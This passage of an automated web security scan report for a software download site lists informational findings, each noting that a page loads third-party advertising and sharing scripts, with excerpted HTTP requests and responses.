<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.140. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:32 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.141. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.142. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.143. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.144. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.145. http://www.x64bitdownload.com/drivers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.146. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/64-bit-vista-drivers.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.147. http://www.x64bitdownload.com/featured-software.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/featured-software.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:32:35 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 29094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.148. http://www.x64bitdownload.com/linktous.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/linktous.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.149. http://www.x64bitdownload.com/new-reviews.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-reviews.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:33:26 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 56251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.150. http://www.x64bitdownload.com/new-software.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-software.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:33:21 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 120254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.151. http://www.x64bitdownload.com/saved-software.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/saved-software.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.152. http://www.x64bitdownload.com/screenshot/communitymate-download-qeakzpwv.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/communitymate-download-qeakzpwv.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/communitymate-download-qeakzpwv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:14 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.153. http://www.x64bitdownload.com/screenshot/news-file-grabber-download-stclytop.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/news-file-grabber-download-stclytop.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/news-file-grabber-download-stclytop.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:29 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 9015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.154. http://www.x64bitdownload.com/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:34 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 9009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.155. http://www.x64bitdownload.com/screenshot/ozum-download-lhtivuds.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/ozum-download-lhtivuds.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:52 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.156. http://www.x64bitdownload.com/screenshot/paragon-extbrowser-download-xwigzbic.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/paragon-extbrowser-download-xwigzbic.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/paragon-extbrowser-download-xwigzbic.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:42 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.157. http://www.x64bitdownload.com/screenshot/rss-reader-download-avwkinlm.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/rss-reader-download-avwkinlm.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/rss-reader-download-avwkinlm.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:49 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.158. http://www.x64bitdownload.com/screenshot/trollkiller-for-firefox-download-ydeukbjf.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:08 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

